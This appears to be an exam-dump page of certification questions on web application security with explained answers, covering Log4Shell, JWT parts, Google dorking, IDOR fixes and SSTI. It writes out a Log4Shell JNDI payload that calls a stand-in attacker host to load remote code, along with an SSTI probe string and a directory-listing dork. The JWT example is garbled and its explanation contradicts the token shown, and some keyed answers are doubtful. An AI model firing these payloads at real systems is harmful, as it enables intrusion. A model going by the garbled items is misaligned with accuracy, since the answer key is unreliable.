In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?
The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.
In the context of the following JWT token, which of the following statements is true?
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ey
JUYW1I1joiU2vjbB3ZiNo_mn0vNWT4G1-
ATqOTmo7rm70VI12WCdkMI_S1_bPg_G8
A JSON Web Token (JWT) consists of three parts separated by dots (.): Header, Payload, and Signature. Each part is Base64Url-encoded. The given JWT is:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJUYW1I1joiU2vjbB3ZiNo_mn0vNWT4G1-ATqOTmo7rm70VI12WCdkMI_S1_bPg_G8
The first part (eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9) is the Header, which typically includes metadata like the algorithm (alg) and type (typ). Decoding it gives: {'alg':'HS256','typ':'JWT'}.
The second part (eyJUYW1I1joiU2vjbB3ZiNo_mn0vNWT4G1-ATqOTmo7rm70VI12WCdkMI_S1_bPg_G8) is the Payload, which contains claims (e.g., user data, expiration). The highlighted segment corresponds to this second part, making it the Payload. Decoding it (though incomplete due to truncation) would reveal claims in JSON format.
The third part (not fully shown) would be the Signature, used to verify the token's integrity.
Option A ('The highlighted segment of the token represents a JWT Header'): Incorrect, as the highlighted segment is the second part, which is the Payload.
Option B ('The highlighted segment of the token represents a JWT Payload'): Correct, as the highlighted segment is the Payload portion of the JWT.
Option C ('Both A and B are correct'): Incorrect, as only B is correct.
Option D ('None of the above'): Incorrect, as B is correct.
The correct answer is B, aligning with the CAP syllabus under 'JWT Security' and 'Token-Based Authentication.'
Which of the following Google Dorks can be used for finding directory listing on victim-app.com?
Google Dorks are advanced search operators used to find specific information or vulnerabilities on the web. Directory listing vulnerabilities occur when a web server exposes the contents of a directory (e.g., file names, paths) due to misconfiguration. The operators intitle: and intext: are used to search for specific terms in the title or body of web pages, respectively, combined with site: to limit the search to a specific domain.
Option A ('intitle:'Index of' site:victim-app.com'): Correct, as intitle:'Index of' targets pages with 'Index of' in the title, a common indicator of directory listings, and site:victim-app.com restricts the search to that domain.
Option B ('intext:'Index of' site:victim-app.com'): Correct, as intext:'Index of' searches for 'Index of' within the page content, another reliable indicator of directory listings, combined with the domain restriction.
Option C ('Both A and B'): Correct, as both intitle: and intext: can effectively identify directory listings, making this the most comprehensive answer.
Option D ('None of the above'): Incorrect, as both A and B are valid Google Dorks for this purpose.
The correct answer is C, aligning with the CAP syllabus under 'Reconnaissance Techniques' and 'Google Dorking.'
After purchasing an item on an e-commerce website, a user can view their order details by visiting the URL:
https://example.com/?order_id=53870
A security researcher pointed out that by manipulating the order_id value in the URL, a user can view arbitrary orders and sensitive information associated with that order_id. There are two fixes:
(Bob's Fix): In order to fix this vulnerability, a developer called Bob devised a fix so that the URL does not disclose the numeric value of the order_id but uses a SHA1 hash of the order_id in the URL, such as:
https://example.com/?order_id=1ff0fe6f1599536d1326418124a261bc98b8ea1
Note: that the SHA1 value of 53870 is 1ff0fe6f1599536d1326418124a261bc98b8ea1
(John's Fix): Another developer called John devised a different fix so that the URL does not disclose the numeric value of the order_id and uses a Base64 encoded value of the order_id in the URL, such as:
https://example.com/?order_id=NTM4NzA=
Note: that the Base64 encoded value of 53870 is NTM4NzA=
Which of the following is correct?
The vulnerability described is an Insecure Direct Object Reference (IDOR), where manipulating the order_id (e.g., 53870) allows unauthorized access to other users' orders. The fixes proposed by Bob and John aim to obscure the numeric value of order_id to prevent easy guessing or manipulation:
Bob's Fix (SHA1 Hash): Replaces order_id=53870 with order_id=1ff0fe6f1599536d1326418124a261bc98b8ea1 (SHA1 hash of 53870). While this obscures the original value, an attacker can still attempt to hash potential order IDs (e.g., 53871, 53872) and test them in the URL. If the application directly uses the hash to look up the order without validating the user's authorization, the vulnerability persists. SHA1 is a one-way hash, but it does not inherently enforce access control.
John's Fix (Base64 Encoding): Replaces order_id=53870 with order_id=NTM4NzA= (Base64 encoding of 53870). Base64 is a reversible encoding, and an attacker can easily decode NTM4NzA= back to 53870 using standard tools. If the application decodes it and uses the original value to fetch orders without authorization checks, the IDOR vulnerability remains.
Evaluation: Both fixes address the symptom (disclosing the numeric value) but fail to address the root cause: lack of authorization validation. The application must ensure that only the authenticated user can access their own orders, regardless of the order_id format (numeric, hashed, or encoded). Neither fix includes such a check, so the vulnerability persists.
Option A ('Both solutions are adequate to fix the problem'): Incorrect, as neither solution enforces authorization.
Option B ('Both solutions are inadequate and the vulnerability is still not fixed'): Correct, as both SHA1 hashing and Base64 encoding are superficial changes that do not prevent unauthorized access.
Option C ('Only John's solution fixes the problem'): Incorrect, as John's Base64 encoding is reversible and does not fix the IDOR issue.
Option D ('Only Bob's solution fixes the problem'): Incorrect, as Bob's SHA1 hashing also does not address the authorization flaw.
The correct answer is B, aligning with the CAP syllabus under 'Insecure Direct Object Reference (IDOR)' and 'Access Control Best Practices.'
The payload {{7*7}} can be used for determining which of the following vulnerabilities?
The payload {{7*7}} is a common test string used to detect Server-Side Template Injection (SSTI) vulnerabilities. SSTI occurs when user input is improperly rendered within a server-side template engine (e.g., Jinja2, Freemarker, or Handlebars), allowing the execution of arbitrary template expressions. If the server evaluates {{7*7}} and returns 49 (the result of 7 multiplied by 7), it indicates that the server is processing the input as a template expression, confirming an SSTI vulnerability. This can potentially lead to remote code execution if the template engine supports advanced features.
Option A ('Server Side Template Injection (SSTI)'): Correct, as {{7*7}} is a standard payload to test for SSTI by checking if the server evaluates the expression.
Option B ('Client-Side Template Injection (CSTI)'): Incorrect, as CSTI involves client-side rendering (e.g., JavaScript templates like Mustache), and {{7*7}} would not be evaluated on the client unless explicitly designed to do so, which is not implied here.
Option C ('Both 1 and 2'): Incorrect, as the payload specifically targets server-side processing.
Option D ('None of the above'): Incorrect, as SSTI is applicable.
The correct answer is A, aligning with the CAP syllabus under 'Server-Side Template Injection' and 'Input Validation.'
Skye
16 days agoPaulina
2 months agoBarb
3 months agoJeffrey
3 months agoWalton
4 months agoJulio
4 months agoLeatha
10 months agoAudry
11 months agoLeonora
12 months agoGraham
12 months ago